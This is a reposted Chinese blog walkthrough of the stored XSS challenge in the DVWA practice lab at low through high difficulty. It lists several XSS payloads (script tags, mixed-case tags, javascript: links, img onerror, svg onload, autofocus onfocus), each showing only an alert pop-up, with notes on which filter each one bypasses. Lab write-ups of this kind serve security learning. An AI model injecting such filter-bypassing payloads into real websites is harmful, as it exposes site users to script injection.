【dvwa靶场：XSS系列】XSS (Stored)低-中-高级别，通关啦

2024/11/5 16:50:11 来源：https://blog.csdn.net/m0_47484034/article/details/143511006 浏览: 次关键词：【dvwa靶场：XSS系列】XSS (Stored)低-中-高级别，通关啦

更改name的文本数量限制大小，

一、低级low

<script>alert("假客套")</script>

过滤了小写，咱们可以大写

<Script>alert("假客套")</script>

点击事件触发弹窗

<a href="javascript:alert('假客套')">点击我触发弹窗</a>

过滤了script以及括号，我们使用其他的标签

<img src=x onerror=alert("假客套")>

<svg onload=alert('假客套');>

慎用，会卡哦，需要清除浏览器缓存，再进入dvwa的xss的stored中，再次点击Clear Guestbook

<input onfocus = alert('假客套') autofocus/>

本网仅为发布的内容提供存储空间，不对发表、转载的内容提供任何形式的保证。凡本网注明“来源：XXX网络”的作品，均转载自其它媒体，著作权归作者所有，商业转载请联系作者获得授权，非商业转载请注明出处。

我们尊重并感谢每一位作者，均已注明文章来源和作者。如因作品内容、版权或其它问题，请及时与我们联系，联系邮箱：809451989@qq.com，投稿邮箱：809451989@qq.com